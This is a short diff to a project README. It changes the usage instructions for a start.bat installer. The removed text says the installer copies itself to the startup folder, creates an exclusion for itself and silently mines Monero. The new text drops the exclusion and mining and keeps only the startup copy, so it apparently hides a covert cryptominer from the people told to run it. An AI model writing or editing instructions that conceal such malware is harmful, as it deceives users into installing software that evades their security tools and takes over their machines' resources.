MBHudson/SM/README.md

 # Usage

-1. Run start.bat.
-The installer will copy itself to the startup folder, create an exclusion for it and will silently start mining Monero for you.
+ Run start.bat.
+The installer will copy itself to the startup folder.